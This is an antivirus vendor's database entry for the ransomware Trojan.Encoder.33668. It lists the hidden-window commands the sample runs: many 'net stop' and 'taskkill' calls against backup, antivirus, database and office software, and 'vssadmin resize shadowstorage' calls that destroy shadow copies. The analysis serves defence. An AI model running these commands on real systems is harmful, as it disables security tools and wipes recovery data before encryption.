マイライブラリ
マイライブラリ

+ マイライブラリに追加

電話

お問い合わせ履歴

電話(英語)

+7 (495) 789-45-86

Profile

Trojan.Encoder.33668

Added to the Dr.Web virus database: 2021-03-22

Virus description added:

Technical Information

Malicious functions
To complicate detection of its presence in the operating system,
deletes volume shadow copies.
Executes the following
  • '%WINDIR%\syswow64\net.exe' stop VeeamDeploymentService /y
  • '%WINDIR%\syswow64\net.exe' stop AcrSch2Svc /y
  • '%WINDIR%\syswow64\net.exe' stop EPSecurityService /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM sqlbrowser.exe /F
  • '%WINDIR%\syswow64\net.exe' stop MSExchangeES /y
  • '%WINDIR%\syswow64\net.exe' stop VeeamBrokerSvc /y
  • '%WINDIR%\syswow64\net.exe' stop mfefire /y
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$CXDB /y
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$SQLEXPRESS /y
  • '%WINDIR%\syswow64\net.exe' stop SMTPSvc /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM infopath.exe /F
  • '%WINDIR%\syswow64\net.exe' stop MsDtsServer110 /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM Ntrtsan.exe /F
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$CITRIX_METAFRAME /y
  • '%WINDIR%\syswow64\net.exe' stop SAVAdminService /y
  • '%WINDIR%\syswow64\net.exe' stop BackupExecRPCService /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM onenote.exe /F
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$PRACTTICEBGC /y
  • '%WINDIR%\syswow64\net.exe' stop McShield /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM PNTMon.exe /F
  • '%WINDIR%\syswow64\net.exe' stop ekrn /y
  • '%WINDIR%\syswow64\net.exe' stop BackupExecAgentAccelerator /y
  • '%WINDIR%\syswow64\net.exe' stop Antivirus /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM thebat64.exe /F
  • '%WINDIR%\syswow64\taskkill.exe' /IM mysqld-nt.exe /F
  • '%WINDIR%\syswow64\net.exe' stop SntpService /y
  • '%WINDIR%\syswow64\net.exe' stop ESHASRV /y
  • '%WINDIR%\syswow64\net.exe' stop MSOLAP$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM visio.exe /F
  • '%WINDIR%\syswow64\net.exe' stop McTaskManager /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$SHAREPOINT /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$PROFXENGAGEMENT /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$TPS /y
  • '%WINDIR%\syswow64\net.exe' stop NetMsmqActivator /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$ECWDB2 /y
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM tmlisten.exe /F
  • '%WINDIR%\syswow64\net.exe' stop RESvc /y
  • '%WINDIR%\syswow64\net.exe' stop TrueKey /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  • '%WINDIR%\syswow64\net.exe' stop "Sophos Agent" /y
  • '%WINDIR%\syswow64\net.exe' stop ReportServer$TPSAMA /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM orale.exe /F
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$VEEAMSQL2012 /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$SQL_2008 /y
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$ECWDB2 /y
  • '%WINDIR%\syswow64\net.exe' stop KAVFSGT /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQLServerOLAPService /y
  • '%WINDIR%\syswow64\net.exe' stop MSExchangeMTA /y
  • '%WINDIR%\syswow64\net.exe' stop IMAP4Svc /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$SOPHOS /y
  • '%WINDIR%\syswow64\net.exe' stop ReportServer$SQL_2008 /y
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$PRACTTICEMGT /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM mydesktopservie.exe /F
  • '%WINDIR%\syswow64\net.exe' stop "Sophos AutoUpdate Service" /y
  • '%WINDIR%\syswow64\net.exe' stop TrueKeyServiceHelper /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM NTAoSMgr.exe /F
  • '%WINDIR%\syswow64\net.exe' stop SQLWriter /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM zoolz.exe /F
  • '%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$TPS /y
  • '%WINDIR%\syswow64\net.exe' stop ShMonitor /y
  • '%WINDIR%\syswow64\net.exe' stop BackupExecDeviceMediaService /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM thebat.exe /F
  • '%WINDIR%\syswow64\net.exe' stop EhttpSrv /y
  • '%WINDIR%\syswow64\net.exe' stop MBAMService /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$SQL_2008 /y
  • '%WINDIR%\syswow64\net.exe' stop MMS /y
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$PROFXENGAGEMENT /y
  • '%WINDIR%\syswow64\net.exe' stop EraserSvc11710 /y
  • '%WINDIR%\syswow64\net.exe' stop bedbg /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$TPSAMA /y
  • '%WINDIR%\syswow64\net.exe' stop sacsvr /y
  • '%WINDIR%\syswow64\net.exe' stop “SQLsafe Backup Service” /y
  • '%WINDIR%\syswow64\net.exe' stop "SQLsafe Filter Service" /y
  • '%WINDIR%\syswow64\net.exe' stop WRSVC /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM isqlplussv.exe /F
  • '%WINDIR%\syswow64\taskkill.exe' /IM agntsv.exe /F
  • '%WINDIR%\syswow64\net.exe' stop OracleClientCache80 /y
  • '%WINDIR%\syswow64\net.exe' stop MSExchangeSRS /y
  • '%WINDIR%\syswow64\net.exe' stop "Sophos Health Service" /y
  • '%WINDIR%\syswow64\net.exe' stop “Enterprise Client Service” /y
  • '%WINDIR%\syswow64\net.exe' stop AVP /y
  • '%WINDIR%\syswow64\net.exe' stop MBEndpointAgent /y
  • '%WINDIR%\syswow64\net.exe' stop McAfeeEngineService /y
  • '%WINDIR%\syswow64\net.exe' stop "Veeam Backup Catalog Data Service" /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$PROD /y
  • '%WINDIR%\syswow64\net.exe' stop "Sophos Safestore Service" /y
  • '%WINDIR%\syswow64\net.exe' stop "SQLsafe Backup Service" /y
  • '%WINDIR%\syswow64\net.exe' stop mfemms /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM mysqld-opt.exe /F
  • '%WINDIR%\syswow64\net.exe' stop IISAdmin /y
  • '%WINDIR%\syswow64\net.exe' stop MSExchangeSA /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM xfssvon.exe /F
  • '%WINDIR%\syswow64\taskkill.exe' /IM ensv.exe /F
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$SHAREPOINT /y
  • '%WINDIR%\syswow64\net.exe' stop macmnsvc /y
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$SOPHOS /y
  • '%WINDIR%\syswow64\net.exe' stop MsDtsServer /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM winword.exe /F
  • '%WINDIR%\syswow64\net.exe' stop VSS /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQLServerADHelper /y
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$SQL_2008 /y
  • '%WINDIR%\syswow64\net.exe' stop swi_service /y
  • '%WINDIR%\syswow64\net.exe' stop mfevtp /y
  • '%WINDIR%\syswow64\net.exe' stop SepMasterService /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM tbirdonfig.exe /F
  • '%WINDIR%\syswow64\net.exe' stop ReportServer$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$PRACTTICEBGC /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$SQLEXPRESS /y
  • '%WINDIR%\syswow64\net.exe' stop mozyprobackup /y
  • '%WINDIR%\syswow64\net.exe' stop MSOLAP$TPSAMA /y
  • '%WINDIR%\syswow64\net.exe' stop "Sophos File Scanner Service" /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$TPSAMA /y
  • '%WINDIR%\syswow64\net.exe' stop ReportServer /y
  • '%WINDIR%\syswow64\net.exe' stop VeeamNFSSvc /y
  • '%WINDIR%\syswow64\net.exe' stop VeeamMountSvc /y
  • '%WINDIR%\syswow64\net.exe' stop POP3Svc /y
  • '%WINDIR%\syswow64\net.exe' stop "Zoolz 2 Service" /y
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$BKUPEXEC /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM outlook.exe /F
  • '%WINDIR%\syswow64\net.exe' stop MySQL80 /y
  • '%WINDIR%\syswow64\net.exe' stop ntrtscan /y
  • '%WINDIR%\syswow64\net.exe' stop KAVFS /y
  • '%WINDIR%\syswow64\net.exe' stop PDVFSService /y
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$VEEAMSQL2008R2 /y
  • '%WINDIR%\syswow64\net.exe' stop wbengine /y
  • '%WINDIR%\syswow64\net.exe' stop "Sophos Message Router" /y
  • '%WINDIR%\syswow64\net.exe' stop "Sophos MCS Agent" /y
  • '%WINDIR%\syswow64\net.exe' stop "Sophos MCS Client" /y
  • '%WINDIR%\syswow64\net.exe' stop kavfsslp /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM steam.exe /F
  • '%WINDIR%\syswow64\net.exe' stop SQLTELEMETRY /y
  • '%WINDIR%\syswow64\net.exe' stop “Veeam Backup Catalog Data Service” /y
  • '%WINDIR%\syswow64\net.exe' stop masvc /y
  • '%WINDIR%\syswow64\net.exe' stop sophossps /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$SYSTEM_BGC /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM mysqld.exe /F
  • '%WINDIR%\syswow64\net.exe' stop SQLTELEMETRY$ECWDB2 /y
  • '%WINDIR%\syswow64\net.exe' stop "Sophos Device Control Service" /y
  • '%WINDIR%\syswow64\net.exe' stop TrueKeyScheduler /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM dbeng50.exe /F
  • '%WINDIR%\syswow64\net.exe' stop SAVService /y
  • '%WINDIR%\syswow64\net.exe' stop “SQLsafe Filter Service” /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM sqlagent.exe /F
  • '%WINDIR%\syswow64\net.exe' stop VeeamCloudSvc /y
  • '%WINDIR%\syswow64\net.exe' stop swi_update /y
  • '%WINDIR%\syswow64\net.exe' stop SDRSVC /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher /y
  • '%WINDIR%\syswow64\net.exe' stop swi_filter /y
  • '%WINDIR%\syswow64\net.exe' stop AcronisAgent /y
  • '%WINDIR%\syswow64\net.exe' stop SstpSvc /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM mspub.exe /F
  • '%WINDIR%\syswow64\net.exe' stop VeeamDeploySvc /y
  • '%WINDIR%\syswow64\net.exe' stop VeeamBackupSvc /y
  • '%WINDIR%\syswow64\net.exe' stop VeeamCatalogSvc /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM oomm.exe /F
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$TPS /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM powerpnt.exe /F
  • '%WINDIR%\syswow64\net.exe' stop svcGenericHost /y
  • '%WINDIR%\syswow64\net.exe' stop swi_update_64 /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$BKUPEXEC /y
  • '%WINDIR%\syswow64\net.exe' stop ARSM /y
  • '%WINDIR%\syswow64\net.exe' stop "Acronis VSS Provider" /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM mydesktopqos.exe /F
  • '%WINDIR%\syswow64\taskkill.exe' /IM msftesql.exe /F
  • '%WINDIR%\syswow64\taskkill.exe' /IM sqlwriter.exe /F
  • '%WINDIR%\syswow64\net.exe' stop MSSQLServerADHelper100 /y
  • '%WINDIR%\syswow64\net.exe' stop BackupExecAgentBrowser /y
  • '%WINDIR%\syswow64\net.exe' stop EPUpdateService /y
  • '%WINDIR%\syswow64\net.exe' stop VeeamRESTSvc /y
  • '%WINDIR%\syswow64\net.exe' stop SmcService /y
  • '%WINDIR%\syswow64\net.exe' stop VeeamEnterpriseManagerSvc /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM sqlservr.exe /F
  • '%WINDIR%\syswow64\net.exe' stop "SQL Backups" /y
  • '%WINDIR%\syswow64\net.exe' stop SQLSafeOLRService /y
  • '%WINDIR%\syswow64\net.exe' stop VeeamTransportSvc /y
  • '%WINDIR%\syswow64\net.exe' stop BackupExecVSSProvider /y
  • '%WINDIR%\syswow64\net.exe' stop MySQL57 /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM sqboreservie.exe /F
  • '%WINDIR%\syswow64\net.exe' stop BackupExecManagementService /y
  • '%WINDIR%\syswow64\net.exe' stop "Sophos Clean Service" /y
  • '%WINDIR%\syswow64\net.exe' stop tmlisten /y
  • '%WINDIR%\syswow64\net.exe' stop SQLSERVERAGENT /y
  • '%WINDIR%\syswow64\net.exe' stop SNAC /y
  • '%WINDIR%\syswow64\net.exe' stop "Sophos Web Control Service" /y
  • '%WINDIR%\syswow64\net.exe' stop SamSs /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM mbamtray.exe /F
  • '%WINDIR%\syswow64\net.exe' stop UI0Detect /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM syntime.exe /F
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$TPSAMA /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$PRACTICEMGT /y
  • '%WINDIR%\syswow64\net.exe' stop MSOLAP$SQL_2008 /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM dbsnmp.exe /F
  • '%WINDIR%\syswow64\taskkill.exe' /IM ossd.exe /F
  • '%WINDIR%\syswow64\net.exe' stop "Sophos System Protection Service" /y
  • '%WINDIR%\syswow64\net.exe' stop EsgShKernel /y
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$SBSMONITORING /y
  • '%WINDIR%\syswow64\net.exe' stop W3Svc /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM exel.exe /F
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$VEEAMSQL2012 /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$SBSMONITORING /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM firefoxonfig.exe /F
  • '%WINDIR%\syswow64\net.exe' stop SQLAgent$PROD /y
  • '%WINDIR%\syswow64\net.exe' stop MsDtsServer100 /y
  • '%WINDIR%\syswow64\net.exe' stop MSOLAP$TPS /y
  • '%WINDIR%\syswow64\net.exe' stop SQLBrowser /y
  • '%WINDIR%\syswow64\net.exe' stop msftesql$PROD /y
  • '%WINDIR%\syswow64\net.exe' stop "Enterprise Client Service" /y
  • '%WINDIR%\syswow64\net.exe' stop FA_Scheduler /y
  • '%WINDIR%\syswow64\net.exe' stop TmCCSF /y
  • '%WINDIR%\syswow64\net.exe' stop McAfeeFrameworkMcAfeeFramework /y
  • '%WINDIR%\syswow64\net.exe' stop McAfeeFramework /y
  • '%WINDIR%\syswow64\net.exe' stop VeeamHvIntegrationSvc /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM wordpad.exe /F
  • '%WINDIR%\syswow64\net.exe' stop DCAgent /y
  • '%WINDIR%\syswow64\net.exe' stop ReportServer$TPS /y
  • '%WINDIR%\syswow64\net.exe' stop "Symantec System Recovery" /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$SHAREPOINT /y
  • '%WINDIR%\syswow64\net.exe' stop Smcinst /y
  • '%WINDIR%\syswow64\net.exe' stop MSExchangeMGMT /y
  • '%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$SBSMONITORING /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM oautoupds.exe /F
  • '%WINDIR%\syswow64\taskkill.exe' /IM msaess.exe /F
  • '%WINDIR%\syswow64\net.exe' stop MSSQLSERVER /y
  • '%WINDIR%\syswow64\net.exe' stop BackupExecJobEngine /y
  • '%WINDIR%\syswow64\net.exe' stop MSExchangeIS /y
  • '%WINDIR%\syswow64\net.exe' stop “Acronis VSS Provider” /y
  • '%WINDIR%\syswow64\taskkill.exe' /IM thunderbird.exe /F
  • '%WINDIR%\syswow64\net.exe' stop MSSQL$VEEAMSQL2008R2 /y
  • '%WINDIR%\syswow64\net.exe' stop klnagent /y
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
Creates and executes the following
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamDeploymentService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSExchangeES /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop EPSecurityService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamBrokerSvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$CXDB /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop mfefire /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$SQLEXPRESS /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM infopath.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SMTPSvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM Ntrtsan.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ESHASRV /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MsDtsServer110 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM sqlbrowser.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SAVAdminService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop BackupExecRPCService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$PRACTTICEBGC /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM PNTMon.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop McShield /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop Antivirus /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ekrn /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM thebat64.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop BackupExecAgentAccelerator /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM mysqld-nt.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SntpService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$CITRIX_METAFRAME /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSOLAP$SYSTEM_BGC /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM onenote.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop AcrSch2Svc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM visio.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop McTaskManager /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$TPS /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop NetMsmqActivator /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$ECWDB2 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$SYSTEM_BGC /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$SYSTEM_BGC /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM tmlisten.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop RESvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher$PROFXENGAGEMENT /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop TrueKey /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos Agent" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$PROFXENGAGEMENT /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM orale.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ReportServer$TPSAMA /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$ECWDB2 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop KAVFSGT /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher$SQL_2008 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLServerOLAPService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSExchangeMTA /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$SOPHOS /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop IMAP4Svc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ReportServer$SQL_2008 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM mydesktopservie.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$PRACTTICEMGT /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$VEEAMSQL2012 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos AutoUpdate Service" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VeeamNFSSvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher$SHAREPOINT /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ReportServer /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "SQLsafe Backup Service" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop McAfeeEngineService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher$TPS /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop BackupExecDeviceMediaService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ShMonitor /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM thebat.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MBAMService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop EhttpSrv /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$PROFXENGAGEMENT /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MMS /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$SQL_2008 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop EraserSvc11710 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$PROD /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM zoolz.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop sacsvr /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "SQLsafe Filter Service" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop bedbg /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop WRSVC /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM isqlplussv.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSExchangeSRS /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop OracleClientCache80 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos Health Service" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM agntsv.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop “Enterprise Client Service” /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MBEndpointAgent /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop AVP /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLFDLauncher$TPSAMA /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop “SQLsafe Backup Service” /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSOLAP$TPSAMA /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Sophos File Scanner Service" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM firefoxonfig.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM mysqld-opt.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop IISAdmin /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSExchangeSA /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM xfssvon.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM ensv.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop macmnsvc /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$SHAREPOINT /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$SOPHOS /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop VSS /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MsDtsServer /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM winword.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQLServerADHelper /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLAgent$SQL_2008 /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SepMasterService /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop mfevtp /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop swi_service /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ReportServer$SYSTEM_BGC /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM tbirdonfig.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$PRACTTICEBGC /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$SQLEXPRESS /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop mozyprobackup /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop TrueKeyServiceHelper /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$TPSAMA /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop mfemms /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop SQLWriter /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MSSQL$SBSMONITORING /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Veeam Backup Catalog Data Service" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM exel.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop "Zoolz 2 Service" /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C taskkill /IM outlook.exe /F' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop ntrtscan /y' (with hidden window)
  • '%WINDIR%\syswow64\cmd.exe' /C net stop MySQL80 /y' (with hidden window)
